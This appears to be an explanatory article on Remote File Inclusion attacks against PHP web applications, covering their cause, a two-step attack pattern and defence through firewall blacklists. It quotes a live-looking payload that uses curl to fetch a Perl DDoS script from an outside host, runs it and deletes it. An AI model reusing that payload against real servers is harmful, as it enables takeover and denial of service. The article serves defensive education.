Remote File Inclusion (RFI) is an attack that targets the computer servers that run Web sites and their applications. RFI exploits are most often attributed to the PHP programming language used by many large firms including Facebook and SugarCRM. However, RFI can manifest itself in other environments and was in fact introduced initially as "SHTML injection". RFI works by exploiting applications that dynamically reference external scripts indicated by user input without proper sanitation. As a consequence, the application can be instructed to include a script hosted on a remote server and thus execute code controlled by an attacker. The executed scripts can be used for temporary data theft or manipulation, or for a long term takeover of the vulnerable server.
Remote File Inclusion (RFI) is caused by insufficient validation of user input provided as parameters to a Web application. Parameters that are vulnerable to RFI enable an attacker to include code from a remotely hosted file in a script executed on the application’s server. Since the attacker’s code is thus executed on the Web server it might be used for temporary data theft or manipulation, or for a long term takeover of the vulnerable server.
The RFI attack vector includes a URL reference to the remotely hosted code. Most attacks include two steps. In the first step, the attack vector references a simple validation script, usually capable of printing some distinguished output to the HTML page. If the validation script is successfully executed by the server under attack, then the attacker proceeds with a second vector that references the actual payload script. The servers hosting the script are either compromised servers or file sharing services.
Step 1: Included file indicates that the application is vulnerable to RFI. For example:
?php /* ZFxID */ echo("Shiro"."Hige"); die("Shiro"."Hige"); /* ZFxID */ ?
Step 2: Attack vector includes the actual payload script. For example:
?php echo exec('cd /tmp;curl -O http://www.yeshouse.net/column/js/ddos.txt;perl ddos.txt;rm -rf ddos.txt*;'); ?
The most common protection mechanism against RFI attacks is based on signatures for known vulnerabilities in the Web Application Firewall (WAF). Detection and blocking of such attacks can be enhanced by creating a blacklist of attack sources and a black-list of URLs of remotely included malicious scripts:
- Advanced knowledge of RFI attack sources enables the WAF to block an attack before it even begins.
- A blacklist of the referenced URL enables the WAF to block exploits targeting zero-day vulnerabilities of applications.
- The blacklist of IPs constructed from the RFI attack observations could be used to block other types of attacks issued from the same malicious sources.